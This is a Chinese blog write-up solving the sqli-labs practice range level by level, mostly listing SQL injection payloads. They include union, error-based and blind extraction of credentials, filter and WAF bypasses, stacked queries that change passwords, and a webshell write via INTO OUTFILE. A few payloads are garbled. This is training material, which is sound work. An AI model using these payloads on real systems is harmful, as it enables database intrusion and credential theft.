Lord0

sqli-labs通关记录

sqli-lab通关记录

docker搭建

运行：docker info //查看docker信息，确认docker正常

搜索sqli-labs：docker search sqli-labs

建立镜像：docker pull acgpiano/sqli-labs

查看存在的镜像：docker images
运行存在的镜像：docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs （参数解释：-dt 后台运行； --name 命名；-p 80:80 将后面的docker容器端口映射到前面的主机端口）

docker ps -a 显示容器container容器的id image 命令端口等信息
使用命令 docker container ls 查看已经启动的容器列表

sqli-labs通关记录

- **sqli-lab通关记录**
Page-1(Basic Challenges)
- Less-1 基于错误的单引号字符串
- Less-2 基于错误的get整型注入
- Less-3 基于错误的get单引号变形字符型注入
- Less-4 基于错误的GET双引号字符型注入
- Less-5 双注入GET单引号字符型注入
- Less-6 双注入GET双引号字符型注入
- Less-7 导出文件GET字符型注入
- Less-8 布尔型单引号GET盲注
- Less-9 基于时间的GET单引号盲注
- Less-10 基于时间的双引号盲注
- Less-11 基于错误的PSOT单引号字符
- Less-12 基于错误的双引号POST型字符变形注入
- Less-13 POST 单引号变形双注入
- Less-14 POST双引号变形双注入
- Less-15 基于bool型/时间延迟单引号POST型盲注
- Less-16 post方法双引号括号绕过时间盲
- Less-17 基于错误的更新查询POST注入
- Less-18 基于错误的用户代理，头部POST注入
- Less-19 基于头部的RefererPOST报错注入
- Less-20 基于错误的cookie头部POST注入
Page-2 (Adv Injections)
- Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)
- Less-22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)
- Less-23 GET - Error based - strip comments (基于错误的，过滤注释的GET型)
- Less - 24 Second Degree Injections *Real treat* -Store Injections (二次注入)
- Less-25 Trick with OR & AND (过滤了or和and)
- Less-25a
- Less-26 Trick with comments and space (过滤了注释和空格的注入)
- less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us(过滤了空格和注释的盲注)
- less 27 GET - Error Based- All your UNION & SELECT belong to us （过滤了union和select的）
- less 27a GET - Blind Based- All your UNION & SELECT belong to us
- less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于错误的，有括号的单引号字符型，过滤了union和select等的注入
- less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于盲注的，有括号的单引号字符型，过滤了union和select等的注入
- Less-29 基于WAF的一个错误
- Less-30 Get-Blind Havaing with WAF
- Less-31 Protection with WAF
- Less-32 Bypass addslashes()
- Less-33 Bypass addslashes()
- Less-34 Bypass Add SLASHES
- Less-35 why care for addslashes()
- Less-36 Bypass MySQL Real Escape String
- Less-37- MySQL_real_escape_string
Page-3 (Stacked Injections)
- Less-38GET- Stacked Query Injection - String
- Less-39GET- Stacked Query Injection - Intiger based
- Less-40GET - BLIND based - String - Stacked
- Less-41GET-BLIND based - Intiger - Stacked
- Less-42POST - Error based String Stacked
- Less-43POST - Error based - String - Stacked with twist
- Less-44POST - Error based String Stacked -Blind
- Less-45 POST - Error based - String - Stacked - Blind
- Less-46 GET-Error based . Numeric . ORDER BY CLAUSE
- Less-47GET-Error based - String - ORDER BY CLAUSE
- Less-48GET - Error based - Blind- Numeric- ORDER BY CLAUSE
- Less-49GET - Error based . String- Blind . ORDER BY CLAUSE
- Less-50GET - Error based - ORDER BY CLAUSE -numeric- Stacked injection
- Less-51GET - Error based - ORDER BY CLAUSE -String- Stacked Injection
- Less-52GET - Blind based - ORDER BY CLAUSE -numeric- Stacked injection
- Less-53GET - GET - Blind based - ORDER BY CLAUSE -String- stacked injection
Page-4 (Challenges)
- Less-54GET - challenge - Union- 10 queries allowed - Variation 1
- Less-55GET - challenge - Union- 14 queries allowed - Variation 2
- Less-56GET - challenge - Union- 14 queries allowed -variation 3
- Less-57GET - challenge - Union- 14 queries allowed - Variation 4
- Less-58GET - challenge - Double Query- 5 queries allowed - Variation 1
- Less-59GET - challenge - Double Query- 5 queries allowed - Variation 2
- Less-60GET - challenge - Double Query- 5 queries allowed - Variation 3
- Less-61GET - challenge - Double Query- 5 queries allowed - Variation 4
- Less-62GET - challenge - Blind - 130 queries allowed - variation 1
- Less-63GET - challenge - Blind - 130 queries allowed -Variation 2
- Less-64GET - challenge - Blind - 130 queries allowed - variation 3
- Less-65GET - challenge - Blind - 130 queries allowed - Variation 4
- OVER

Page-1(Basic Challenges)

Less-1 基于错误的单引号字符串

/?id=1
正常访问
/?id=1’

返回报错信息：You have an error in your SQL syntax; check the manual that corresponds to your     MySQL  server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

使用–+绕过
/?id=1’ --+
判断字段数
?id=1’ order by 4 --+
发现order by 3 回显正常，order by 4时报错，说明只有3个字段
判断注入点
?id=1’ and 1=2 union select 1,2,3 --+
发现2，3处可注入

?id=1’ and 1=2 union select 1,database(),3 --+
得到数据库security
查找数据库security中的表
?id=1' and 1=2 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

查找表users中的列名
?id=1' and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

爆破用户名和密码
?id=1' and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

Less-2 基于错误的get整型注入

?id=1‘ --+报错
然后进行同less-1操作

?id=1 and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users)

Less-3 基于错误的get单引号变形字符型注入

?id=1’ --+报错
使用’) --+来闭合
如less-1查询字段，表名，列名

?id=1') order by 4--+
依然是只有三个字段

?id=1') and 1=2 union select 1,2,3 --+
查回显

?id=1' )and 1=2 union select 1,database(),3--+
查询数据库

?id=1' )and 1=2 union select 1,database(),and 1=2 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查security中的表

?id=1' )and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
查user表中的列

?id=1' )and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+
爆破

Less-4 基于错误的GET双引号字符型注入

双引号报错

?id=1") --+回显正常
其余操作同上

Less-5 双注入GET单引号字符型注入

使用concat聚合函数
参考资料：http://www.2cto.com/article/201303/192718.html

简单的说，使用聚合函数进行双注入查询时，会在错误信息中显示一部分错误信息。

比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。

双注：当查询语句的前面出现聚合函数就是多个返回结果count()就是多行的意思后面的查询结果代码会以错误的形式显示出来

?id=1' order by 4--+
判断字段数

1' union all select count(*),2,concat( '~',(select schema_name from information_schema.schemata limit 4,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
获取数据库 security 这里使用union all

1' union all select count(*),2,concat( '~',(select table_name from information_schema.tables where table_schema = 'security' limit 3,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23

获取表 users

1' union all select count(*),1,concat( '~',(select column_name from information_schema.columns where table_name= 'users' limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23

爆出了三个字段,字段不存在也是返回you are in…

1' union all select count(*),1,concat( '~',(select concat(id,username,password) from users limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23

成功
时间延迟型手工注入：(手工测试比较麻烦，建议使用sqlmap)
正确会延迟，错误没有延迟

爆库长

?id=1' and if(length(database())=8,sleep(5),1)--+

明显延迟，数据库长度为8

爆库名

?id=1' and if(left(database(),1)='s',sleep(5),1)--+

明显延迟，数据库第一个字符为s，然后增加left(database(),字符长度)中的字符长度，等号右边以此爆破下一个字符，正确时会延迟。最终爆破得到left(database(),8)=‘security’

爆表名

?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+

改变limit _,1 的数值的出表名users

爆列名

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+

爆破值

?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

Less-6 双注入GET双引号字符型注入

法一：报错注入（转载）

何为报错注入：
报错注入就是通过人为的引起数据库的报错，但是数据库在报错的同时会将查询的结果也呈现在报错中,我在这里介绍一下报错注入以及原理
这是网上使用最广泛的一句报错注入语句：
select count(*),(floor(rand(0)2))x from information_schema.tables group by x;
那么必须是要按这个句子来执行吗,或者必须要这些句子吗？
通过查找很多网站的资料，我总结出：
group by,rand(),floor()三个函数是必须存在的，缺一不可，并且rand(),rand(0)两个句子还是有一些区别的，其中rand()在两条数据以上随即报错,rand(0)在三条数据以上必报错
原文链接：https://blog.csdn.net/weixin_43258754/article/details/87888269

?id=1" union select 1,count(*),concat((select user()),floor(rand(0)*2))a from information_schema.columns group by a --+

法二：双注

获取数据库

1" union select count(*),2,concat_ws(char(58),(select version()) ,floor(rand(0)*2)) a from information_schema.schemata group by a %23

获取表

1" union all select count(*),1,concat('~', (select schema_name from information_schema.schemata limit 4,1),floor(rand(0)*2)) a from information_schema.schemata group by a %23

获取数据
1" union all select count(*),1,concat('~',(select concat(username,password) from users limit 0,1),'~',floor(rand(0)*2)) a from information_schema.tables group by a %23

Less-7 导出文件GET字符型注入

学习函数：

outfile函数
outfile函数就是将数据库的查询内容导出到一个外部文件

dumpfile 转储函数
转储函数只能储存一行数据所以我们在导出的时候需要加以限制

load_file 下载文件，作用是从操作系统向数据库中写入文件，和前面的outfile刚好相反

select load_file("/var/lib/mysql-files/1.txt");

本题只需对文件写入一个一句话木马

?id=1')) union select 1,"",3 into outfile "/var/lib
/mysql-files/1.txt" --+;

Less-8 布尔型单引号GET盲注

盲注
分为基于布尔的盲注和基于时间的盲注
先判断注入类型，单引号字符型注入，但是没有报错回显
使用报错语句没有报错，这里我们采用布尔型盲注

学习函数：
length() 返回字符串的长度

数据库名字是security总共有8位，所以我们这里使用
?id=1' and length(database())=8 --+注入

=9 时就会报错,这个就是盲注的原理

操作同less-5

Less-9 基于时间的GET单引号盲注

考虑时间型盲注

?id=1' and sleep(3) --+

明显延迟，注入成功

当?id=1' and if(length(database())=8 , sleep(3), 1) --+时明显延迟，所以库名长为8

?id=1' and if(left(database(),1)='s' , sleep(3), 1) --+

发现明显延迟说明库名第一个字符为 ‘s’

?id=1' and if(left(database(),8)='security' , sleep(3), 1) --+

库名为 security

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(3), 1) --+

使用limit x,1 查询第x个表名，和爆破库名一样，第一个表名为referer

爆到users这个表

操作同Less-5

Less-10 基于时间的双引号盲注

把上一题Less-9的单引号改成双引号，一样的注入

Less-11 基于错误的PSOT单引号字符

弱口令admin登录成功
使用Burp抓包

判断字段
-admin’ order by 2 --+时正常，字段为3

回显（注意uname是错误的，才能显示联合查询内容）

然后就进行正常爆破操作

Less-12 基于错误的双引号POST型字符变形注入

单引号改为双引号并用) --+进行闭合

Less-13 POST 单引号变形双注入

单引号注入，使用’) --+闭合

Less-14 POST双引号变形双注入

Less-15 基于bool型/时间延迟单引号POST型盲注

布尔盲注

admin’ and 1=1 --+
admin’ and 1=2 --+

时间盲注

admin’ and sleep(5) --+

明显延迟，可使用时间盲注

Less-16 post方法双引号括号绕过时间盲

同less-15单引号改为") --+

Less-17 基于错误的更新查询POST注入

$uname=check_input($_POST['uname']);  
$passwd=$_POST['passwd'];

发现用户名被特殊处理

这里需要学习check_input()函数

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}
 
		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}
 
		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}
只截取15个字符

get_magic_quotes_gpc()

当magic_quotes_gpc=On的时候，函数get_magic_quotes_gpc()就会返回1

当magic_quotes_gpc=Off的时候，函数get_magic_quotes_gpc()就会返回0

magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据，如包括有：post、get、cookie过来的数据增加转义字符“\”，以确保这些数据不会引起程序，特别是数据库语句因为特殊字符引起的污染而出现致命的错误。

在magic_quotes_gpc = On的情况下，如果输入的数据有

单引号（’）、双引号（”）、反斜线（\）与 NULL（NULL 字符）等字符都会被加上反斜线。

stripslashes()删除由 addslashes() 函数添加的反斜杠

ctype_digit()判断是不是数字，是数字就返回true，否则返回false

mysql_real_escape_string()转义 SQL 语句中使用的字符串中的特殊字符。

intval()     整型转换

不能从uname入手，从passwd入手

使用updatexml（）

爆库

&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

爆表

admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e),1) --+

爆列

&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user')),0x7e),1) --+

&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+

失败

加一层select

&passwd=admin' and  updatexml(1,concat(0x7e,(select password from (select password from users where username='admin'))),1) --+

成功

&passwd=11'  and  updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') m ),0x7e),1) --+

Less-18 基于错误的用户代理，头部POST注入

报错型，单引号，user-agent型注入点

看到user-agent的回显，猜测注入点在user-agnet

抓包修改user-agent改为payload就可以了

爆库payload

 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

爆库

User-Agent: User-Agent: 1',1,updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5e),1)) #

爆列

User-Agent: 1',1,updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name='uagents'),0x5e),1)) #

Less-19 基于头部的RefererPOST报错注入

单引号，报错型，referer型注入点
回显是referer,注入点为referer
操作同less-18

Less-20 基于错误的cookie头部POST注入

单引号，报错型，cookie型注入

cookie：uname=admin可以肯定是cookie注入了

字段数为4，然后进行回显，爆库，爆表，爆列

Page-2 (Adv Injections)

Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

base64编码，单引号，报错型，cookie型注入。

本关和less-20相似，只是cookie的uname值经过base64编码。

YWRtaW4是admin经过base64加密后得到的，所以本题在cookie处加密了字符串

爆库

-admin') union select 1,2,database()# //明文
LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw== //密文

故在上传其他payload时也需要通过base64加密

Less-22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)

base64编码，双引号，报错型，cookie型注入

同less-21一样，只需要使用双引号代替单引号再取掉括号即可

例

-admin" union select 1,2,database()# //明文
LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj//密文

Less-23 GET - Error based - strip comments (基于错误的，过滤注释的GET型)

过滤了注释符 # –
?id=1’ or ‘1’=’1
爆库

?id=' union select 1,2,database() '

爆表

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '

爆列

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '

爆值

?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

Less - 24 Second Degree Injections Real treat -Store Injections (二次注入)

先注册一个 admin’ #的用户
然后在修改密码的时候构造这样一个sql语句，把admin的密码修改为123123

UPDATE users SET PASSWORD=’123’ where username=’admin’ #’ and password=’123456’

Less-25 Trick with OR & AND (过滤了or和and)

```
--+绕过
```

?id=-1' union select 1,2,group_concat(username,passwoorrd) from users--+

2.双写or或and绕过

?id=0' oorr 1=1 --+
?id=2' aandnd 1=1 --+

or and形成闭合语句

Less-25a

直接在前面添加or或and
延时注入
?id=-1 || if(length(database())=8,1,sleep(5))#
联合注入

?id=-1 union select 1,database(),3#

Less-26 Trick with comments and space (过滤了注释和空格的注入)

空格，or，and,/*,#,–,/等符号被过滤

对于注释和结尾字符的我们此处只能利用构造一个 ’ 来闭合后面到 ’ ；对于空格，有较多的方法：

%27 '

%a0 空格

()可以绕过

?id=1' aandnd(updatexml(1,concat(0x5e,database(),0x5e),1));%00

例爆库
或者
%a0 进行空格绕过,%27进行’绕过

判断字段数
（hackbar中输入&&时，需要自行URL编码为%26%26，否则会报错）

?id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271
?id=0%27union%a0select%a01,2,3,4%a0%26%26%a0%271%27=%271

可以判断字段数为3

爆库

?id=0%27union%a0select%a01,database(),3%26%26%271%27=%271

爆表时information里的or会被过滤，需要双写为infoorrmation

?id=0%27union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=%27security%27%26%26%a0%271%27=%271

爆列时information和and双写

?id=0'%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema=%27security%27%0baandnd%0btable_name=%27users%27%0b%26%26%0b%271'=%271

爆值

?id=0%27%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a0%271%27=%271

也可以一起查
where ‘1’='1,是为了让语句变成无约束查询

?id=0%27%a0union%a0select%a01,group_concat(username,passwoorrd),3%a0from%a0users%a0where%a0%271%27=%271

less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us(过滤了空格和注释的盲注)

%0b TAB键（垂直）
同26，还要多添加一个括号

爆库
?id=0%27)%0Bunion%0Bselect%0B1,database(),3%0B||(%271%27)=(%271
爆表
?id=0')%0bunion%0bselect%0b1,group_concat(table_name),3%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema='security'%26%26('1')=('1
查用户名
?id=0')%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema='security'%0baandnd%0btable_name='users'%26%26('1')=('1
查密码
?id=0')%0bunion%0bselect%0b1,group_concat(passwoorrd),3%0bfrom%0busers%0bwhere%0b('1')=('1
一起查
?id=0')%0bunion%0bselect%0b1,group_concat(passwoorrd,username),3%0bfrom%0busers%0bwhere%0b('1')=('1

less 27 GET - Error Based- All your UNION & SELECT belong to us （过滤了union和select的）

‘和空格均被过滤
使用大小写绕过

less 27a GET - Blind Based- All your UNION & SELECT belong to us

less 27的盲注版本，双引号型

less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于错误的，有括号的单引号字符型，过滤了union和select等的注入

大小写和单引号闭合绕过

例

?id=0%27)%a0uNion%a0sElect(1),(database()),(%273

less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于盲注的，有括号的单引号字符型，过滤了union和select等的注入

同28

Less-29 基于WAF的一个错误

输入一个引号错误，两个引号正常

Less-30 Get-Blind Havaing with WAF

改为双引号

Less-31 Protection with WAF

Less-32 Bypass addslashes()

绕过 addslashes()
宽字节绕过引号转义
‘替换成\’ “替换成\” \替换成 \”

?id=1%df’报错

Less-33 Bypass addslashes()

同32

Less-34 Bypass Add SLASHES

Burp抓包，操作同32

Less-35 why care for addslashes()

为什么要关心addslashes()
不需要绕过，直接注入

Less-36 Bypass MySQL Real Escape String

?id=1%df’报错
?id=1%df’–+正常

Less-37- MySQL_real_escape_string

Page-3 (Stacked Injections)

堆叠注入：在数据库中可以执行多条SQL语句，语句之间以分号(;)隔开

Less-38GET- Stacked Query Injection - String

id=1时

堆叠注入后
?id=1' ;update users set password='123' where username='Dumb' --+

Less-39GET- Stacked Query Injection - Intiger based

数字型注入

id=1时
创建新用户
?id=1;insert into users values(100,'create','create');--+

id=100时
创建成功

Less-40GET - BLIND based - String - Stacked

单引号括号’)进行闭合
?id=1’无回显
?id=1’ --+无回显
?id=1’)–+回显正常

Less-41GET-BLIND based - Intiger - Stacked

数字型注入
同39

Less-42POST - Error based String Stacked

user设置了过滤函数mysqli_real_escape_string()

所以在密码处构造

login_user=admin&login_password=123456' and updatexml(1,concat(0x5e,substr((select group_concat(username,0x7e,password) from users),1,31),0x5e),1) #&mysubmit=Login

Less-43POST - Error based - String - Stacked with twist

同42，只需将单引号改为’)

login_user=admin&login_password=admin') and updatexml(1,concat(0x5e,substr((select group_concat(username,0x7e,password) from users),1,31),0x5e),1) #&mysubmit=Login

Less-44POST - Error based String Stacked -Blind

闭合方式为单引号
密码处创建一个新用户

666登录成功

Less-45 POST - Error based - String - Stacked - Blind

闭合方式为’)
同43

Less-46 GET-Error based . Numeric . ORDER BY CLAUSE

要用到order by 相关注入的知识

?sort=1 desc或者asc，显示结果不同，表明可以注入

直接添加注入语句，?sort=(select ******)

爆库

?sort=(select updatexml(1,concat(0x5e,database(),0x5e),1))

爆表

?sort=(select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e),1) )

爆列

?sort=(select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user')),0x7e),1))

爆值

?sort=(select updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1))

也可以使用?sort=1 and (加sql语句)进行注入

还可以进行时间注入

?sort=1 and sleep(5)有延迟，可以时间注入

Less-47GET-Error based - String - ORDER BY CLAUSE

?sort=1’报错
?sort=1’ --+正常
其余同46

Less-48GET - Error based - Blind- Numeric- ORDER BY CLAUSE

无报错，不能进行报错注入
可以使用时间注入，同46

Less-49GET - Error based . String- Blind . ORDER BY CLAUSE

一样无报错，同48进行时间注入

Less-50GET - Error based - ORDER BY CLAUSE -numeric- Stacked injection

堆叠注入

了解mysqli_multi_query()函数
mysqli_multi_query()可以执行多个sql语句，而mysqli_query()只能执行一个sql语句

?sort=1;insert into users values(50,'50','50');

成功

Less-51GET - Error based - ORDER BY CLAUSE -String- Stacked Injection

?sort=1’报错
?sort=1’–+正常
同前

Less-52GET - Blind based - ORDER BY CLAUSE -numeric- Stacked injection

单引号双引号均无报错
?sort=1 and sleep(5)有延迟，可以使用时间注入
或者数字型注入

Less-53GET - GET - Blind based - ORDER BY CLAUSE -String- stacked injection

单引号无报错，双引号正常
?sort=1’ --+正常

Page-4 (Challenges)

Less-54GET - challenge - Union- 10 queries allowed - Variation 1

已知数据库为CHALLENGES，且仅有十次尝试机会，十次以后会随机生成一个新的表名和密码

?id=1回显
?id=1’ 回显异常
?id=1’ --+回显正常

?id=-1’ union select 1,2 --+回显异常
?id=-1’ union select 1,2,3 --+回显正常
说明字段数为3

爆表

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

爆列

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='3LVU9O6T45'),3 --+

爆值

?id=-1' union select 1,(select group_concat(id,0x7e,sessid,0x7e,secret_0BWB,0x7e,tryy) from 3LVU9O6T45),3 --+

得到1~d44516e88a548ff1b4d73b7f9ee80a0a~q2N28tfxsGUc0Eo0ycKZBJy6~8

Less-55GET - challenge - Union- 14 queries allowed - Variation 2

同样十四次机会

最终发现?id=1) --+回显正常

其余同上

Less-56GET - challenge - Union- 14 queries allowed -variation 3

还是十四次机会
尝试后发现?id=1’) --+回显正常

其余同上

Less-57GET - challenge - Union- 14 queries allowed - Variation 4

十四次机会
尝试后发现?id=1" --+回显正常
其余同上

Less-58GET - challenge - Double Query- 5 queries allowed - Variation 1

只有五次机会

?id=1’报错

爆表

?id=-1' and updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5e),1)--+

爆列

?id=-1' and updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name='KMMILD2HQ3'),0x5e),1)--+

爆值

?id=-1' and updatexml(1,concat(0x5e,(select secret_G9AY from KMMILD2HQ3),0x5e),1)--+

得到1jwSc79Nx9tQBzjDQ1YmGrt3
输入即可

Less-59GET - challenge - Double Query- 5 queries allowed - Variation 2

同样五次机会
数字型注入

?id=1’

爆表

?id=-1 and updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5e),1)

其余同上

Less-60GET - challenge - Double Query- 5 queries allowed - Variation 3

五次机会
?id=1") --+回显正常
其余同上

Less-61GET - challenge - Double Query- 5 queries allowed - Variation 4

五次机会
?id=1’)) --+回显正常
其余同上

Less-62GET - challenge - Blind - 130 queries allowed - variation 1

一百三十次。。
尝试后发现
无报错回显
?id=1’) --+回显正常
union查询也不显示
?id=1’) and sleep(5)–+有延迟，可以进行时间注入

Less-63GET - challenge - Blind - 130 queries allowed -Variation 2

同样无报错
?id=1’ --+回显正常
?id=1’ and sleep(5) --+有延迟，进行时间注入

Less-64GET - challenge - Blind - 130 queries allowed - variation 3

同样无报错
?id=1)) --+回显正常
?id=1)) and sleep(5) --+有延迟，进行时间注入

Less-65GET - challenge - Blind - 130 queries allowed - Variation 4

?id=1") --+回显正常
同上

个人水平有限还请各位大佬指出错误

OVER

你可能感兴趣的:(sqli-labs)

Sqli-labs靶场第11关详解[Sqli-labs-less-11] 「已注销」 sqli-labs 数据库 web安全网络安全 mysql sql
Sqli-labs-Less-11前言：SQL注入的三个条件：①参数可控；（从参数输入就知道参数可控）②参数过滤不彻底导致恶意代码被执行；（需要在测试过程中判断）③参数带入数据库执行。（从网页功能能大致分析出是否与数据库进行交互）利用orderby来测列数测显位：mysql用1,2,3,4Mysql获取相关数据：一、数据库版本-看是否认符合information_schema查询-version(
sqli-labs less17 password-update语句 Yix1a
转自一位不知名大佬的笔记-----------------------------------less-17-----------------------------------原urlhttp://192.168.137.138/sqli-labs-master/Less-17/页面显示：[PASSWORDRESET]（密码重置）说明这个页面很有可能是使用了update语句很多网页有修改密码的功
Sqli-labs——lesson11 Shock397 Sqli-labs闯关安全
在11关是登录界面了我们可以先用bp抓包来看它的post请求来再在Hackbar里面的postdata里面对数据进行操作1、在对uname的admin加上'后回显错误，说明此处存在注入漏洞2、首先先在username中验证：用or1=1#即可验证此处确实存在注入漏洞同样在password位也能验证出来3、验证成功后我们开始构造sql语句进行注入1）判断列数:输入orderby3回显错误，2正确，说
sqli-labs靶场安装小红帽Like大灰狼 Kali 网络安全 sql靶场 sql注入小皮搭建sqli-labs靶场
1、下载小皮官网下载：https://www.xp.cn/2、安装小皮不要安装在有中文的目录下3、打开靶场，解压靶场靶场地址（我网盘分享了）sqli-labs靶场提取码：jctl**4、配置网站**5、浏览器访问网站安装成功
《SQLi-Labs》05. Less 29~37 永别了，赛艾斯滴恩 less android 前端
title:《SQLi-Labs》05.Less29~37date:2024-01-1722:49:10updated:2024-02-1218:09:10categories:WriteUp：Security-Labexcerpt:HTTP参数污染，联合注入、宽字节注入。comments:falsetags:top_image:/images/backimg/SunsetClimbing.png
云服务器利用Docker搭建sqli-labs靶场环境
在云服务器上利用Docker搭建sqli-labs靶场环境可以通过以下步骤完成：安装Docker：首先，你需要在你的云服务器上安装Docker。具体命令如下：sudoapt-getupdatesudoapt-getinstalldocker-ce拉取sqli-labs镜像：接下来，你需要从DockerHub上拉取sqli-labs的镜像。可以使用以下命令完成：dockerpullaudi1/sql
Sqli-Labs 通关笔记神丶上单数据库 mysql sql 网络安全 web
文章目录07-SQL注入1.搭建sqli靶场2.完成SQLi-LABSPage-1**Less-1GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)**1.获取当前数据库2.获取所有库名3.获取表名4.获取表的所有字段5.获取users表所有字段内容**Less-2GET-Errorbased-Intigerbased(基于错误的GET整型注入
sqli-labs环境安装及所遇到的坑积极向上的三毛
我们采用的是Sqli-labs+phpstudy的方式。1.下载phpstudy并解压安装，下载地址：https://www.xp.cn/download.html?utm_source=so注意：本机由于一开始下的版本过高，导致不兼容。以下为2016版。从网上查询得知，因为sqli-labs是很多年前的了，php版本过高会导致无法解析。2.Sqli-labs项目地址—Github获取：https
CTF--Web安全--SQL注入之Post-Union注入给我杯冰美式 Web安全--SQL注入 web安全 sql 安全
一、手动POST注入实现绕过账号密码检测我们利用sqli-labs/Less-11靶场来进行演示：我们可以看到一个登录页面打开Less-11的根目录，我们打开页面的源代码(PHP实现)。用VS-code打开文件，找到验证登录信息的代码行。此形式的代码存在POST注入漏洞。我们可以注入一句万能密码。admin'or1=1#单看这句代码可能不是很直观，我们将这句万能密码写到源代码中进行观察。@$sql
CTF-Web安全--SQL注入之Union注入详解给我杯冰美式 Web安全--SQL注入 web安全 sql 安全
一、测试靶场与使用工具浏览器：火狐浏览器--Firefox靶场：sqli-labs使用插件：HackBar操作环境：phpstudy二、判断字符型注入与数字型注入操作步骤：1、用F12打开控制台，打开HackBar,LoarURL，将当前靶场的URL信息复制到操作台上2、输入?id=1，观察到页面发生变化，显示的是id=1时数据库中的信息，？是用来分割URL和查询字符串的，查询到了id=1时的用户
Sqli-labs靶场1-5 777sea 网络安全技术学习 sql web安全
流程判断注入点和注入类型判断字段个数判断显示位爆库爆表爆字段名爆内容配置注意事项使用sqli-labs本地靶场，配置本地靶场需要注意的问题：数据库配置文件db-creds.incphp版本由于该靶场比较古早，所以php的版本要选择更低一点的，比如5.3.29Less-1单引号注入1.判断注入点和注入类型单引号报错?id=-1'--+2.查字段个数?id=1'orderby4--+3.判断显示位?i
CenOS6.5搭建sqli-labs-master靶场环境 Toert_T sql注入安全信息安全 sql 网络安全 mysql php
目录一、靶场搭建环境准备二、搭建过程0x1配置本地软件仓库0x2安装sqli-labs支持服务0x3部署sqli-labs靶场三、测试sqli-labs靶场环境一、靶场搭建环境准备sqli-labs-master是一套结合http+php+mysql环境的sql注入练习平台，里面有丰富的sql注入靶场环境虚拟机软件：VMware®Workstation16Pro虚拟机系统：Centos6.5虚拟网
sqli-labs-master靶场搭建详细过程（附下载链接） Sarahie 靶场网络安全
